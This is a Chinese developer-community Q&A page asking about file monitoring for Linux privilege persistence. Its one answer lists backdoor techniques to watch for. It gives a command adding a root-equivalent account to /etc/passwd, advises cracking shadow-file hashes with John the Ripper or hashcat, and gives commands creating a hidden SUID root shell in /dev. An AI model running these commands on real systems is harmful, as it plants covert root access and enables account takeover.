AI 助理
备案控制台
开发者社区 问答 正文

Linux安全中权限维持之文件监控的注意事项以及用法是什么?

Linux安全中权限维持之文件监控的注意事项以及用法是什么?

展开
收起
游客qzzytmszf3zhq 2021-12-05 21:02:37 279 分享 版权

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

1 条回答
写回答
取消 提交回答
  • 游客yzrzs5mf6j7yy

    常见的后门权限维持技术如下,从常见的后门技术,对文件进行监控

    (1)增加超级用户帐号

    echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd

    (2)破解/嗅控用户密码

    获得shadow文件后,用John the Ripper工具破解薄弱的用户密码,根据我所使用的情况下只能破解一些简单常用密码其它密码很难跑出来。除此之外可以使用hashcatGPU、或者分布式服务器来进行破解

    (3)放置SUID Shell**

    普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。

    cp /bin/bash /dev/.rootshell chmod u+s /dev/.rootshell

    2021-12-05 22:23:24
    赞同 展开评论
问答分类:
监控 安全 Linux
问答标签:
Linux用法 Linux权限 Linux安全 Linux注意事项 Linux权限用法
问答地址:
开发者社区 > 开发与运维 > 问答
相关问答
容器缺少linux CAP_SYS_ADMIN 权限,导致无法执行 mount、unmount 命令
1588
1
0
Alibaba Cloud Linux 2-阿里云Linux操作系统主要通过什么保障操作系统安全?
1026
1
0
Linux编程之杂项技术中sync的功能与用法是什么?
1574
1
0
Linux编程之杂项技术中echo的功能与用法有什么内容?
1685
1
0
Linux编程之杂项技术中ifconfig的功能与用法有哪些?
1529
1
0
Linux编程之杂项技术中chmod的功能与用法是什么?
1520
1
0
Linux编程之杂项技术中chown的功能与用法是什么?
1529
1
0
Linux编程之杂项技术中find的功能与用法是什么?
1450
1
0
Linux编程之杂项技术中cat有什么功能与用法?
1525
1
0
Linux编程之杂项技术中gedit有什么功能与用法?
1589
1
0